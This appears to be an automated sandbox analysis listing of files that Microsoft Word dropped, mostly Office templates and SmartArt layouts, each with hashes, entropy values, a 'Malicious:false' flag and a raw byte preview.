                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):11380
                                                                                                                                                                                                                                                                Entropy (8bit):7.891971054886943
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                                                                                                                                MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                                                                                                                                SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                                                                                                                                SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                                                                                                                                SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):256
                                                                                                                                                                                                                                                                Entropy (8bit):3.464918006641019
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                                                                                                                                                                                                MD5:93149E194021B37162FD86684ED22401
                                                                                                                                                                                                                                                                SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                                                                                                                                                                                                SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                                                                                                                                                                                                SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):51826
                                                                                                                                                                                                                                                                Entropy (8bit):5.541375256745271
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                                                                                                                                MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                                                                                                                                SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                                                                                                                                SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                                                                                                                                SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):302
                                                                                                                                                                                                                                                                Entropy (8bit):3.537169234443227
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                                                                                                                                MD5:9C00979164E78E3B890E56BE2DF00666
                                                                                                                                                                                                                                                                SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                                                                                                                                                                                                                                SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                                                                                                                                                                                                                                SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):217137
                                                                                                                                                                                                                                                                Entropy (8bit):5.068335381017074
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                                                                                                                                MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                                                                                                                                SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                                                                                                                                SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                                                                                                                                SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):254
                                                                                                                                                                                                                                                                Entropy (8bit):3.4845992218379616
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                                                                                                                                                                                                SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                                                                                                                                                                                                SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                                                                                                                                                                                                SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):6024
                                                                                                                                                                                                                                                                Entropy (8bit):7.886254023824049
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                                                                                                                                MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                                                                                                                                SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                                                                                                                                SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                                                                                                                                SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):242
                                                                                                                                                                                                                                                                Entropy (8bit):3.4938093034530917
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                                                                                                                                                                                                SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                                                                                                                                                                                                SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                                                                                                                                                                                                SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4888
                                                                                                                                                                                                                                                                Entropy (8bit):7.8636569313247335
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                                                                                                                                MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                                                                                                                                SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                                                                                                                                SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                                                                                                                                SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):258
                                                                                                                                                                                                                                                                Entropy (8bit):3.4692172273306268
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:C1B36A0547FB75445957A619201143AC
                                                                                                                                                                                                                                                                SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                                                                                                                                                                                                                                SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                                                                                                                                                                                                                                SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):7370
                                                                                                                                                                                                                                                                Entropy (8bit):7.9204386289679745
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                                                                                                                                                                                                                                MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                                                                                                                                                                                                                                SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                                                                                                                                                                                                                                SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                                                                                                                                                                                                                                SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):252
                                                                                                                                                                                                                                                                Entropy (8bit):3.48087342759872
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXXt1MIae2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyfMIaRGHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:69757AF3677EA8D80A2FBE44DEE7B9E4
                                                                                                                                                                                                                                                                SHA1:26AF5881B48F0CB81F194D1D96E3658F8763467C
                                                                                                                                                                                                                                                                SHA-256:0F14CA656CDD95CAB385F9B722580DDE2F46F8622E17A63F4534072D86DF97C3
                                                                                                                                                                                                                                                                SHA-512:BDA862300BAFC407D662872F0BFB5A7F2F72FE1B7341C1439A22A70098FA50C81D450144E757087778396496777410ADCE4B11B655455BEDC3D128B80CFB472A
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .P.i.c.t.u.r.e.F.r.a.m.e...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):4326
                                                                                                                                                                                                                                                                Entropy (8bit):7.821066198539098
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                                                                                                                                                                                                                                                MD5:D32E93F7782B21785424AE2BEA62B387
                                                                                                                                                                                                                                                                SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                                                                                                                                                                                                                                                SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                                                                                                                                                                                                                                                SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):238
                                                                                                                                                                                                                                                                Entropy (8bit):3.472155835869843
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                                                                                                                                                                                                MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                                                                                                                                                                                                SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                                                                                                                                                                                                SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                                                                                                                                                                                                SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):5151
                                                                                                                                                                                                                                                                Entropy (8bit):7.859615916913808
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                                                                                                                                MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                                                                                                                                SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                                                                                                                                SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                                                                                                                                SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s
